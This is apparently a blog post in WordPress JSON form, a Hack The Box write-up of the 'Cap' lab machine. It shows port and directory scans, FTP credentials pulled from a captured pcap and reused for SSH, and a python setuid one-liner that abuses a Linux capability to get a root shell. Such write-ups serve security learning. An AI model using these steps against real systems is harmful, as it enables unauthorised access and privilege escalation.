{"id":716,"date":"2024-06-27T21:17:08","date_gmt":"2024-06-27T20:17:08","guid":{"rendered":"https:\/\/thehackingblog.com\/?p=716"},"modified":"2024-06-27T21:17:08","modified_gmt":"2024-06-27T20:17:08","slug":"htb-cap","status":"publish","type":"post","link":"https:\/\/thehackingblog.com\/htb-cap\/","title":{"rendered":"HTB: Cap"},"content":{"rendered":"

Details<\/h1>\n

This machine is Cap from Hack the Box<\/p>\n

Recon<\/h1>\n
kali@kali:~$ nmap -sV -p- 10.10.10.245\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-06-13 09:24 EDT\nNmap scan report for 10.10.10.245\nHost is up (0.022s latency).\nNot shown: 65532 closed ports\nPORT   STATE SERVICE VERSION\n21\/tcp open  ftp     vsftpd 3.0.3\n22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)\n80\/tcp open  http    gunicorn\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port80-TCP:V=7.91%I=7%D=6\/13%Time=60C6073C%P=x86_64-pc-linux-gnu%r(GetR\nSF:equest,105F,"HTTP\/1\\.0\\x20200\\x20OK\\r\\nServer:\\x20gunicorn\\r\\nDate:\\x20\nSF:Sun,\\x2013\\x20Jun\\x202021\\x2013:26:24\\x20GMT\\r\\nConnection:\\x20close\\r\\\nSF:nContent-Type:\\x20text\/html;\\x20charset=utf-8\\r\\nContent-Length:\\x20193\nSF:86\\r\\n\\r\\n<!DOCTYPE\\x20html>\\n<html\\x20class=\\"no-js\\"\\x20lang=\\"en\\">\\\nSF:n\\n<head>\\n\\x20\\x20\\x20\\x20<meta\\x20charset=\\"utf-8\\">\\n\\x20\\x20\\x20\\x2\nSF:0<meta\\x20http-equiv=\\"x-ua-compatible\\"\\x20content=\\"ie=edge\\">\\n\\x20\\\nSF:x20\\x20\\x20<title>Security\\x20Dashboard<\/title>\\n\\x20\\x20\\x20\\x20<meta\\\nSF:x20name=\\"viewport\\"\\x20content=\\"width=device-width,\\x20initial-scale=\nSF:1\\">\\n\\x20\\x20\\x20\\x20<link\\x20rel=\\"shortcut\\x20icon\\"\\x20type=\\"image\nSF:\/png\\"\\x20href=\\"\/static\/images\/icon\/favicon\\.ico\\">\\n\\x20\\x20\\x20\\x20<\nSF:link\\x20rel=\\"stylesheet\\"\\x20href=\\"\/static\/css\/bootstrap\\.min\\.css\\">\nSF:\\n\\x20\\x20\\x20\\x20<link\\x20rel=\\"stylesheet\\"\\x20href=\\"\/static\/css\/fon\nSF:t-awesome\\.min\\.css\\">\\n\\x20\\x20\\x20\\x20<link\\x20rel=\\"stylesheet\\"\\x20\nSF:href=\\"\/static\/css\/themify-icons\\.css\\">\\n\\x20\\x20\\x20\\x20<link\\x20rel=\nSF:\\"stylesheet\\"\\x20href=\\"\/static\/css\/metisMenu\\.css\\">\\n\\x20\\x20\\x20\\x2\nSF:0<link\\x20rel=\\"stylesheet\\"\\x20href=\\"\/static\/css\/owl\\.carousel\\.min\\.\nSF:css\\">\\n\\x20\\x20\\x20\\x20<link\\x20rel=\\"stylesheet\\"\\x20href=\\"\/static\/c\nSF:ss\/slicknav\\.min\\.css\\">\\n\\x20\\x20\\x20\\x20<!--\\x20amchar")%r(HTTPOption\nSF:s,B3,"HTTP\/1\\.0\\x20200\\x20OK\\r\\nServer:\\x20gunicorn\\r\\nDate:\\x20Sun,\\x2\nSF:013\\x20Jun\\x202021\\x2013:26:24\\x20GMT\\r\\nConnection:\\x20close\\r\\nConten\nSF:t-Type:\\x20text\/html;\\x20charset=utf-8\\r\\nAllow:\\x20GET,\\x20HEAD,\\x20OP\nSF:TIONS\\r\\nContent-Length:\\x200\\r\\n\\r\\n")%r(RTSPRequest,121,"HTTP\/1\\.1\\x2\nSF:0400\\x20Bad\\x20Request\\r\\nConnection:\\x20close\\r\\nContent-Type:\\x20text\nSF:\/html\\r\\nContent-Length:\\x20196\\r\\n\\r\\n<html>\\n\\x20\\x20<head>\\n\\x20\\x20\nSF:\\x20\\x20<title>Bad\\x20Request<\/title>\\n\\x20\\x20<\/head>\\n\\x20\\x20<body>\\\nSF:n\\x20\\x20\\x20\\x20<h1><p>Bad\\x20Request<\/p><\/h1>\\n\\x20\\x20\\x20\\x20Invali\nSF:d\\x20HTTP\\x20Version\\x20&#x27;Invalid\\x20HTTP\\x20Version:\\x20&#x27;RTSP\nSF:\/1\\.0&#x27;&#x27;\\n\\x20\\x20<\/body>\\n<\/html>\\n")%r(FourOhFourRequest,189\nSF:,"HTTP\/1\\.0\\x20404\\x20NOT\\x20FOUND\\r\\nServer:\\x20gunicorn\\r\\nDate:\\x20S\nSF:un,\\x2013\\x20Jun\\x202021\\x2013:26:29\\x20GMT\\r\\nConnection:\\x20close\\r\\n\nSF:Content-Type:\\x20text\/html;\\x20charset=utf-8\\r\\nContent-Length:\\x20232\\\nSF:r\\n\\r\\n<!DOCTYPE\\x20HTML\\x20PUBLIC\\x20\\"-\/\/W3C\/\/DTD\\x20HTML\\x203\\.2\\x20\nSF:Final\/\/EN\\">\\n<title>404\\x20Not\\x20Found<\/title>\\n<h1>Not\\x20Found<\/h1>\nSF:\\n<p>The\\x20requested\\x20URL\\x20was\\x20not\\x20found\\x20on\\x20the\\x20ser\nSF:ver\\.\\x20If\\x20you\\x20entered\\x20the\\x20URL\\x20manually\\x20please\\x20ch\nSF:eck\\x20your\\x20spelling\\x20and\\x20try\\x20again\\.<\/p>\\n");\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 142.81 seconds<\/code><\/pre>\n
User<\/h1>\n
I started by browsing to http:\/\/10.10.10.245<\/a> <\/p>\n
\"Screenshot<\/p>\n
I ran a dirsearch to enumerate potential endpoints <\/p>\n
kali@kali:~$ dirsearch -u http:\/\/10.10.10.245 -w \/opt\/SecLists\/Discovery\/Web-Content\/raft-large-words.txt       \n\n  _|. _ _  _  _  _ _|_    v0.4.1\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 119600\n\nError Log: \/opt\/dirsearch\/logs\/errors-21-06-13_09-36-42.log\n\nTarget: http:\/\/10.10.10.245\/\n\nOutput File: \/opt\/dirsearch\/reports\/10.10.10.245\/_21-06-13_09-36-42.txt\n\n[09:36:42] Starting: \n[09:36:42] 302 -  208B  - \/data  ->  http:\/\/10.10.10.245\/\n[SNIP]<\/code><\/pre>\n
\/data<\/code> redirected back to the root, so I ran a search on it assuming it may be a directory <\/p>\n
kali@kali:~$ dirsearch -u http:\/\/10.10.10.245\/data -w \/opt\/SecLists\/Discovery\/Web-Content\/raft-large-words.txt \n\n  _|. _ _  _  _  _ _|_    v0.4.1                                                                                  \n (_||| _) (\/_(_|| (_| )                                                                                           \n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 119600\n\nError Log: \/opt\/dirsearch\/logs\/errors-21-06-13_09-37-55.log\n\nTarget: http:\/\/10.10.10.245\/data\/                                                                                 \n\nOutput File: \/opt\/dirsearch\/reports\/10.10.10.245\/data_21-06-13_09-37-55.txt\n\n[09:37:55] Starting: \n[09:37:56] 200 -   17KB - \/data\/2        \n[09:37:56] 200 -   17KB - \/data\/0        \n[09:37:57] 200 -   17KB - \/data\/02        \n[09:38:00] 200 -   17KB - \/data\/00    \n[SNIP]<\/code><\/pre>\n
I accessed http:\/\/10.10.10.245\/data\/00<\/a><\/p>\n
\"Screenshot<\/p>\n
I clicked download and it offered me a pcap<\/code> file. So, I opened this in Wireshark. Within this I found an FTP stream which I inspected <\/p>\n
\"Screenshot<\/p>\n
This gave me some creds of <\/p>\n
nathan : Buck3tH4TF0RM3!<\/code><\/pre>\n
So I tested them on FTP<\/p>\n
kali@kali:~$ ftp 10.10.10.245\nConnected to 10.10.10.245.\n220 (vsFTPd 3.0.3)\nName (10.10.10.245:kali): nathan\n331 Please specify the password.\nPassword:\n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp><\/code><\/pre>\n
I then looked for any useful files <\/p>\n
ftp> ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\n-r--------    1 1001     1001           33 Jun 13 13:24 user.txt\n226 Directory send OK.\n\n# ftp> get user.txt\nlocal: user.txt remote: user.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for user.txt (33 bytes).\n226 Transfer complete.\n33 bytes received in 0.00 secs (716.1458 kB\/s)\n\nkali@kali:~$ cat user.txt\n[REDACTED]<\/code><\/pre>\n
The user flag!<\/p>\n
Root<\/h1>\n
So I had the user flag, but still needed to get onto the machine properly. I tried the same creds on ssh<\/p>\n
kali@kali:~$ ssh nathan@10.10.10.245\nnathan@10.10.10.245's password: \nWelcome to Ubuntu 20.04.2 LTS (GNU\/Linux 5.4.0-73-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of Sun Jun 13 13:46:04 UTC 2021\n\n  System load:           0.02\n  Usage of \/:            35.0% of 8.73GB\n  Memory usage:          22%\n  Swap usage:            0%\n  Processes:             227\n  Users logged in:       0\n  IPv4 address for eth0: 10.10.10.245\n  IPv6 address for eth0: dead:beef::250:56ff:feb9:a2f\n\n  => There are 2 zombie processes.\n\n * Super-optimized for small spaces - read how we shrank the memory\n   footprint of MicroK8s to make it the smallest full K8s around.\n\n   https:\/\/ubuntu.com\/blog\/microk8s-memory-optimisation\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nLast login: Thu May 27 11:21:27 2021 from 10.10.14.7\nnathan@cap:~$<\/code><\/pre>\n
Looking around I found <\/p>\n
nathan@cap:\/var\/www\/html$ ls -la\ntotal 32\ndrwxr-xr-x 6 nathan nathan 4096 May 25 07:25 .\ndrwxr-xr-x 3 root   root   4096 May 23 19:17 ..\ndrwxr-xr-x 2 nathan nathan 4096 May 27 09:10 __pycache__\n-rw-r--r-- 1 nathan nathan 4293 May 25 07:25 app.py\ndrwxr-xr-x 6 root   root   4096 May 23 19:17 static\ndrwxr-xr-x 2 root   root   4096 May 23 19:17 templates\ndrwxr-xr-x 2 root   root   4096 Jun 13 13:30 upload\n\nnathan@cap:\/var\/www\/html$ cat app.py\n[SNIP]\ndef capture():\n\n        get_lock()\n        pcapid = get_appid()\n        increment_appid()\n        release_lock()\n\n        path = os.path.join(app.root_path, "upload", str(pcapid) + ".pcap")\n        ip = request.remote_addr\n        # permissions issues with gunicorn and threads. hacky solution for now.\n        #os.setuid(0)\n        #command = f"timeout 5 tcpdump -w {path} -i any host {ip}"\n        command = f"""python3 -c 'import os; os.setuid(0); os.system("timeout 5 tcpdump -w {path} -i any host {ip}")'"""\n        os.system(command)\n        #os.setuid(1000)\n\n        return redirect("\/data\/" + str(pcapid))<\/code><\/pre>\n
So it looks like this app is using setuid<\/code> to give itself root privileges. So it likely isn’t running as root directly. The main way this can happen is if the binary, in this case python, has either the suid<\/code> bit set, or a capability assigned <\/p>\n
nathan@cap:\/var\/www\/html$ getcap \/usr\/bin\/python3.8\n\/usr\/bin\/python3.8 = cap_setuid,cap_net_bind_service+eip<\/code><\/pre>\n
So it has an assigned capabilty. Therefore, we can use this to become root ourselves. I simply used the Python os<\/code> module to setuid(0)<\/code> then spawn a \/bin\/sh<\/code> instance. Which would be as root<\/p>\n
nathan@cap:\/var\/www\/html$ python3 -c "import os;os.setuid(0);os.system('\/bin\/sh')"\n#\n\n# id\nuid=0(root) gid=1001(nathan) groups=1001(nathan)<\/code><\/pre>\n
Just need to grab the flag <\/p>\n
\n# cd \/root\n\n# ls -la\ntotal 36\ndrwx------  6 root root 4096 May 27 09:16 .\ndrwxr-xr-x 20 root root 4096 Jun  1 10:09 ..\nlrwxrwxrwx  1 root root    9 May 15 21:40 .bash_history -> \/dev\/null\n-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc\ndrwxr-xr-x  3 root root 4096 May 23 19:17 .cache\ndrwxr-xr-x  3 root root 4096 May 23 19:17 .local\n-rw-r--r--  1 root root  161 Dec  5  2019 .profile\ndrwx------  2 root root 4096 May 23 19:17 .ssh\nlrwxrwxrwx  1 root root    9 May 27 09:16 .viminfo -> \/dev\/null\n-r--------  1 root root   33 Jun 13 13:24 root.txt\ndrwxr-xr-x  3 root root 4096 May 23 19:17 snap\n\n# cat root.txt\n[REDACTED]<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Details This machine is Cap from Hack the Box Recon kali@kali:~$ nmap -sV -p- 10.10.10.245 Starting … HTB: Cap<\/span>Read more<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-716","post","type-post","status-publish","format-standard","hentry","category-hack-the-box"],"yoast_head":"\nHTB: Cap - The Hacking Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/thehackingblog.com\/htb-cap\/\" \/>\n<meta property=\"og:locale\" content=\"en_GB\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HTB: Cap - The Hacking Blog\" \/>\n<meta property=\"og:description\" content=\"Details This machine is Cap from Hack the Box Recon kali@kali:~$ nmap -sV -p- 10.10.10.245 Starting … HTB: CapRead more\" \/>\n<meta property=\"og:url\" content=\"https:\/\/thehackingblog.com\/htb-cap\/\" \/>\n<meta property=\"og:site_name\" content=\"The Hacking Blog\" \/>\n<meta property=\"article:published_time\" content=\"2024-06-27T20:17:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/img.barradell-johns.com\/blog\/writeups\/hackTheBox\/cap\/screenshot1.png\" \/>\n<meta name=\"author\" content=\"Jack\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Jack\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimated reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/thehackingblog.com\\\/htb-cap\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/thehackingblog.com\\\/htb-cap\\\/\"},\"author\":{\"name\":\"Jack\",\"@id\":\"https:\\\/\\\/thehackingblog.com\\\/#\\\/schema\\\/person\\\/17e47c3f67fa43eeaf61e3e9a7b1481f\"},\"headline\":\"HTB: Cap\",\"datePublished\":\"2024-06-27T20:17:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/thehackingblog.com\\\/htb-cap\\\/\"},\"wordCount\":205,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/thehackingblog.com\\\/htb-cap\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/img.barradell-johns.com\\\/blog\\\/writeups\\\/hackTheBox\\\/cap\\\/screenshot1.png\",\"articleSection\":[\"Hack The Box\"],\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/thehackingblog.com\\\/htb-cap\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/thehackingblog.com\\\/htb-cap\\\/\",\"url\":\"https:\\\/\\\/thehackingblog.com\\\/htb-cap\\\/\",\"name\":\"HTB: Cap - The Hacking Blog\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/thehackingblog.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/thehackingblog.com\\\/htb-cap\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/thehackingblog.com\\\/htb-cap\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/img.barradell-johns.com\\\/blog\\\/writeups\\\/hackTheBox\\\/cap\\\/screenshot1.png\",\"datePublished\":\"2024-06-27T20:17:08+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/thehackingblog.com\\\/#\\\/schema\\\/person\\\/17e47c3f67fa43eeaf61e3e9a7b1481f\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/thehackingblog.com\\\/htb-cap\\\/#breadcrumb\"},\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/thehackingblog.com\\\/htb-cap\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\\\/\\\/thehackingblog.com\\\/htb-cap\\\/#primaryimage\",\"url\":\"https:\\\/\\\/img.barradell-johns.com\\\/blog\\\/writeups\\\/hackTheBox\\\/cap\\\/screenshot1.png\",\"contentUrl\":\"https:\\\/\\\/img.barradell-johns.com\\\/blog\\\/writeups\\\/hackTheBox\\\/cap\\\/screenshot1.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/thehackingblog.com\\\/htb-cap\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/thehackingblog.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"HTB: Cap\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/thehackingblog.com\\\/#website\",\"url\":\"https:\\\/\\\/thehackingblog.com\\\/\",\"name\":\"The Hacking Blog\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/thehackingblog.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-GB\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/thehackingblog.com\\\/#\\\/schema\\\/person\\\/17e47c3f67fa43eeaf61e3e9a7b1481f\",\"name\":\"Jack\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/25a78bd1aff451516365cb42a8518aa40bb9fff7f8ce565ea61f70d76c5e33ae?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/25a78bd1aff451516365cb42a8518aa40bb9fff7f8ce565ea61f70d76c5e33ae?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/25a78bd1aff451516365cb42a8518aa40bb9fff7f8ce565ea61f70d76c5e33ae?s=96&d=mm&r=g\",\"caption\":\"Jack\"},\"sameAs\":[\"http:\\\/\\\/167.233.207.198\"],\"url\":\"https:\\\/\\\/thehackingblog.com\\\/author\\\/jack\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"HTB: Cap - The Hacking Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/thehackingblog.com\/htb-cap\/","og_locale":"en_GB","og_type":"article","og_title":"HTB: Cap - The Hacking Blog","og_description":"Details This machine is Cap from Hack the Box Recon kali@kali:~$ nmap -sV -p- 10.10.10.245 Starting … HTB: CapRead more","og_url":"https:\/\/thehackingblog.com\/htb-cap\/","og_site_name":"The Hacking Blog","article_published_time":"2024-06-27T20:17:08+00:00","og_image":[{"url":"https:\/\/img.barradell-johns.com\/blog\/writeups\/hackTheBox\/cap\/screenshot1.png","type":"","width":"","height":""}],"author":"Jack","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Jack","Estimated reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/thehackingblog.com\/htb-cap\/#article","isPartOf":{"@id":"https:\/\/thehackingblog.com\/htb-cap\/"},"author":{"name":"Jack","@id":"https:\/\/thehackingblog.com\/#\/schema\/person\/17e47c3f67fa43eeaf61e3e9a7b1481f"},"headline":"HTB: Cap","datePublished":"2024-06-27T20:17:08+00:00","mainEntityOfPage":{"@id":"https:\/\/thehackingblog.com\/htb-cap\/"},"wordCount":205,"commentCount":0,"image":{"@id":"https:\/\/thehackingblog.com\/htb-cap\/#primaryimage"},"thumbnailUrl":"https:\/\/img.barradell-johns.com\/blog\/writeups\/hackTheBox\/cap\/screenshot1.png","articleSection":["Hack The Box"],"inLanguage":"en-GB","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/thehackingblog.com\/htb-cap\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/thehackingblog.com\/htb-cap\/","url":"https:\/\/thehackingblog.com\/htb-cap\/","name":"HTB: Cap - The Hacking Blog","isPartOf":{"@id":"https:\/\/thehackingblog.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/thehackingblog.com\/htb-cap\/#primaryimage"},"image":{"@id":"https:\/\/thehackingblog.com\/htb-cap\/#primaryimage"},"thumbnailUrl":"https:\/\/img.barradell-johns.com\/blog\/writeups\/hackTheBox\/cap\/screenshot1.png","datePublished":"2024-06-27T20:17:08+00:00","author":{"@id":"https:\/\/thehackingblog.com\/#\/schema\/person\/17e47c3f67fa43eeaf61e3e9a7b1481f"},"breadcrumb":{"@id":"https:\/\/thehackingblog.com\/htb-cap\/#breadcrumb"},"inLanguage":"en-GB","potentialAction":[{"@type":"ReadAction","target":["https:\/\/thehackingblog.com\/htb-cap\/"]}]},{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/thehackingblog.com\/htb-cap\/#primaryimage","url":"https:\/\/img.barradell-johns.com\/blog\/writeups\/hackTheBox\/cap\/screenshot1.png","contentUrl":"https:\/\/img.barradell-johns.com\/blog\/writeups\/hackTheBox\/cap\/screenshot1.png"},{"@type":"BreadcrumbList","@id":"https:\/\/thehackingblog.com\/htb-cap\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/thehackingblog.com\/"},{"@type":"ListItem","position":2,"name":"HTB: Cap"}]},{"@type":"WebSite","@id":"https:\/\/thehackingblog.com\/#website","url":"https:\/\/thehackingblog.com\/","name":"The Hacking Blog","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/thehackingblog.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-GB"},{"@type":"Person","@id":"https:\/\/thehackingblog.com\/#\/schema\/person\/17e47c3f67fa43eeaf61e3e9a7b1481f","name":"Jack","image":{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/secure.gravatar.com\/avatar\/25a78bd1aff451516365cb42a8518aa40bb9fff7f8ce565ea61f70d76c5e33ae?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/25a78bd1aff451516365cb42a8518aa40bb9fff7f8ce565ea61f70d76c5e33ae?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/25a78bd1aff451516365cb42a8518aa40bb9fff7f8ce565ea61f70d76c5e33ae?s=96&d=mm&r=g","caption":"Jack"},"sameAs":["http:\/\/167.233.207.198"],"url":"https:\/\/thehackingblog.com\/author\/jack\/"}]}},"_links":{"self":[{"href":"https:\/\/thehackingblog.com\/wp-json\/wp\/v2\/posts\/716","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thehackingblog.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thehackingblog.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thehackingblog.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thehackingblog.com\/wp-json\/wp\/v2\/comments?post=716"}],"version-history":[{"count":0,"href":"https:\/\/thehackingblog.com\/wp-json\/wp\/v2\/posts\/716\/revisions"}],"wp:attachment":[{"href":"https:\/\/thehackingblog.com\/wp-json\/wp\/v2\/media?parent=716"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thehackingblog.com\/wp-json\/wp\/v2\/categories?post=716"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thehackingblog.com\/wp-json\/wp\/v2\/tags?post=716"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}